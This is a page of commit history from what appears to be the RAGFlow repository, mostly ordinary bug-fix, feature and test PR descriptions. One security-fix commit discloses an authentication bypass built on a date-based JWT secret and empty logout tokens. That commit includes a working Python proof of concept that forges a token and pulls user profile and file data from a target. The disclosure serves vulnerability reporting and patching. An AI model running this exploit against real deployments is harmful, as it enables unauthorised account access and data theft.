Commit Graph

3146 Commits

Author SHA1 Message Date
9c6c6c51e0 Fix: use jwks_uri from OIDC metadata for JWKS client (#8136)
### What problem does this PR solve?
Issue: #8051

The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.

Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery

### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint

```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"

# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri)  # Use discovered endpoint
```

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-10 10:16:58 +08:00
baf32ee461 Display only the duplicate column names and corresponding original source. (#8138)
### What problem does this PR solve?
This PR aims to slove #8120 which request a better error display of
duplicate column names.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-10 10:16:38 +08:00
8fb6b5d945 Feat: Add agent operator node from agent form #3221 (#8144)
### What problem does this PR solve?

Feat: Add agent operator node from agent form #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-09 19:19:48 +08:00
5cc2eda362 Test: Refactor test fixtures and add SDK session management tests (#8141)
### What problem does this PR solve?

- Consolidate HTTP API test fixtures using batch operations
(batch_add_chunks, batch_create_chat_assistants)
- Fix fixture initialization order in clear_session_with_chat_assistants
- Add new SDK API test suite for session management
(create/delete/list/update)

### Type of change

- [x] Add test cases
- [x] Refactoring
2025-06-09 18:13:26 +08:00
9a69d5f367 Feat: Display chat content on the agent page #3221 (#8140)
### What problem does this PR solve?

Feat: Display chat content on the agent page #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-09 18:13:06 +08:00
d9b98cbb18 Feat: Convert the prompt field of the agent operator to an array #3221 (#8137)
### What problem does this PR solve?

Feat: Convert the prompt field of the agent operator to an array #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-09 16:02:33 +08:00
24625e0695 Fix: presentation of PDF using vlm. (#8133)
### What problem does this PR solve?

#8109

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-09 15:01:52 +08:00
4649accd54 Test: Add SDK API tests for chat assistant management and improve con… (#8131)
### What problem does this PR solve?

- Implement new SDK API test cases for chat assistant CRUD operations
- Enhance HTTP API concurrent tests to use as_completed for better
reliability

### Type of change

- [x] Add test cases
- [x] Refactoring
2025-06-09 13:30:12 +08:00
968ffc7ef3 Refa: dataset operations to simplify error handling (#8132)
### What problem does this PR solve?

- Consolidate database operations within single try-except blocks in the
methods

### Type of change

- [x] Refactoring
2025-06-09 13:29:56 +08:00
2337bbf6ca Perf: pass useless check for tidy graph (#8121)
### What problem does this PR solve?
Support passing the attribute check when the upstream has already made
sure it.

### Type of change
- [X] Performance Improvement
2025-06-09 11:44:13 +08:00
ad1f89fea0 Fix: chat module update LLM defaults (#8125)
### What problem does this PR solve?

Previously when LLM.model_name was not configured:
- System incorrectly defaulted to 'deepseek-chat' model
- This caused permission errors for unauthorized tenants

Now:
- Use tenant's default chat_model configuration first

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-09 11:44:02 +08:00
2ff911b08c Fix: Set default rerank_model to empty string in Chat class (#8130)
### What problem does this PR solve?

Previously when LLM.rerank_model was not configured:
- SDK would pass None as the value
- Database field with null=False constraint would reject it
- Caused storage failures for unset rerank_model cases

Now:
- SDK checks for None value before database operations
- Provides empty string as default when rerank_model is unset

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-09 11:43:42 +08:00
1ed0b25910 Fix task_limiter in raptor.py (#8124)
### What problem does this PR solve?

Fix task_limiter in raptor.py

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-09 10:18:03 +08:00
5825a24d26 Test: Refactor test concurrency handling and add SDK chunk management tests (#8112)
### What problem does this PR solve?

- Improve concurrent test cases by using as_completed for better
reliability
- Rename variables for clarity (chunk_num -> count)
- Add new SDK API test suite for chunk management operations
- Update HTTP API tests with consistent concurrency patterns

### Type of change

- [x] Add test cases
- [x] Refactoring
2025-06-06 19:43:14 +08:00
157cd8b1b0 Docs: Added auto-keyword auto-question guide (#8113)
### What problem does this PR solve?

### Type of change


- [x] Documentation Update
2025-06-06 19:27:41 +08:00
06463135ef Feat: Reference the output variable of the upstream operator #3221 (#8111)
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-06 19:27:29 +08:00
7ed9efcd4e Fix: QWenCV issue. (#8106)
### What problem does this PR solve?

Close #8097

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-06 17:55:13 +08:00
0bc1f45634 Feat: Enables the message operator form to reference the data defined by the begin operator #3221 (#8108)
### What problem does this PR solve?

Feat: Enables the message operator form to reference the data defined by
the begin operator #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-06 17:54:59 +08:00
1885a4a4b8 Feat: Receive reply messages of different event types from the agent #3221 (#8100)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-06 16:30:18 +08:00
0e03542db5 fix: single task executor getting all tasks from Redis queue (#7330)
### What problem does this PR solve?

Currently, as long as there are tasks in Redis, this loop will keep
getting the tasks. This will lead to a single task executor with many
tasks in the pending state. Then we need to wait for the pending tasks
to get them back in the queue.

In first place, if we set the `MAX_CONCURRENT_TASKS` to X, then only X
tasks should be picked from the queue, and others should be left in the
queue for other `task_executors` or be picked after 1 of the spots in
the current executor gets free. This PR ensures this behavior.

The additional changes were due to the Ruff linting in pre-commit. But I
believe these are expected to keep the coding style.

### Type of change

- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):

Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
2025-06-06 14:32:35 +08:00
2e44c3b743 Fix:Unimplemented function in ppt_parser (#8095)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/8088

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-06 10:05:58 +08:00
d1ff588d46 Docs: Updated server launching code (#8093)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change


- [x] Documentation Update
2025-06-06 09:48:18 +08:00
cc1b2c8f09 Test: add sdk Document test cases (#8094)
### What problem does this PR solve?

Add sdk document test cases

### Type of change

- [x] Add test cases
2025-06-06 09:47:06 +08:00
100ea574a7 Fix(python-sdk): Add name filtering support to Dataset.list_documents() (#8090)
### What problem does this PR solve?

Added name filtering capability for Dataset.list_documents()

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 19:04:35 +08:00
92625e1ca9 Fix: document typo in test (#8091)
### What problem does this PR solve?

fix document typo in test

### Type of change

- [x] Typo
2025-06-05 19:03:46 +08:00
f007c1c772 Fix: Resolve JSON download errors in Document.download() (#8084)
### What problem does this PR solve?

An exception is thrown only when the json file has only two keys, `code`
and `message`. In other cases, response.content is returned normally.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 18:03:51 +08:00
841291dda0 Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 (#8083)
### What problem does this PR solve?

Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 17:43:28 +08:00
6488f22540 Feat: Convert the inputs parameter of the begin operator #3221 (#8081)
### What problem does this PR solve?

Feat: Convert the inputs parameter of the begin operator #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-05 16:29:48 +08:00
6953ae89c4 Fix:when stream=false,new message without sessionid does no (#8078)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8070

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 15:14:15 +08:00
7c7359a9b2 Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080)
### What problem does this PR solve?

Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-05 15:12:21 +08:00
ee52000870 Test: add sdk Dataset test cases (#8077)
### What problem does this PR solve?

Add sdk dataset test cases

### Type of change

- [x] Add test case
2025-06-05 13:20:28 +08:00
91804f28f1 Fix: issue for tavily only in a assistant. (#8076)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 13:00:43 +08:00
8b7c424617 Fix: Document.update() now refreshes object data (#8068)
### What problem does this PR solve?

#8067 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:46:29 +08:00
640fca7dc9 Fix: set output for Message template (#8064)
### What problem does this PR solve?
now Streamning logic is not match with none streaming logic, which may
introduce down stream can not find upstream components.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:10:40 +08:00
de89b84661 Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description

There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.


### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token

**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    
    auth_headers = {"Authorization": malicious_token}
    
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials


**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
2025-06-05 12:10:24 +08:00
f819378fb0 Update api_utils.py (#8069)
### What problem does this PR solve?


https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486
lazy throw exception to better support custom embedding model

### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:05:58 +08:00
c163b799d2 Feat: Create empty agent #3221 (#8054)
### What problem does this PR solve?

Feat: Create empty agent #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-05 12:04:31 +08:00
4f3abb855a Fix: remove zhipu ai api key (#8066)
### What problem does this PR solve?

- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
  Example: export ZHIPU_AI_API_KEY=your_api_key_here

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:04:09 +08:00
a374816fb2 Don't use ',' (U+FF0C) but ', ' (U+2C U+20) (#8063)
The Unicode codepoint ',' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.

### What problem does this PR solve?

Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2025-06-05 09:29:07 +08:00
ab5e3ded68 Fix: DataSet.update() now refreshes object data (#8058)
### What problem does this PR solve?

#8057 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 09:26:19 +08:00
ec60b322ab Fix: data missing after upgrading. (#8047)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-04 16:25:34 +08:00
8445143359 Feat: Add RunSheet component #3221 (#8045)
### What problem does this PR solve?

Feat: Add RunSheet component #3221
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-04 15:56:47 +08:00
9938a4cbb6 Feat: Allow update conversation parameters and persist to database in completion (#8039)
### What problem does this PR solve?

This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-04 14:39:04 +08:00
73f9c226d3 Fix: Allow None value for parser_config in create_dataset SDK method (#8041)
### What problem does this PR solve?

Fix parser_config=None handling in create_dataset

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-04 13:16:32 +08:00
52c814b89d Refa: Move HTTP API tests to top-level test directory (#8042)
### What problem does this PR solve?

Move test cases only - CI still runs tests under sdk/python

### Type of change

- [x] Refactoring
2025-06-04 13:16:17 +08:00
b832372c98 Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037)
### What problem does this PR solve?

Close #8033

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-04 10:18:14 +08:00
7b268eb134 Docs: Miscellaneous UI updates (#8031)
### What problem does this PR solve?



### Type of change

- [x] Documentation Update
2025-06-04 09:31:41 +08:00
31d2b3cb5a Fix: Grammar and clarity improvements in prompt templates (#8023)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.

## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation

## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.

## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs

Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
2025-06-03 19:41:59 +08:00
ef899a8859 Feat: Add DynamicPrompt component #3221 (#8028)
### What problem does this PR solve?

Feat: Add DynamicPrompt component #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-03 19:41:35 +08:00
e47186cc42 Feat: Add AgentNode component #3221 (#8019)
### What problem does this PR solve?

Feat: Add AgentNode component #3221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2025-06-03 17:42:30 +08:00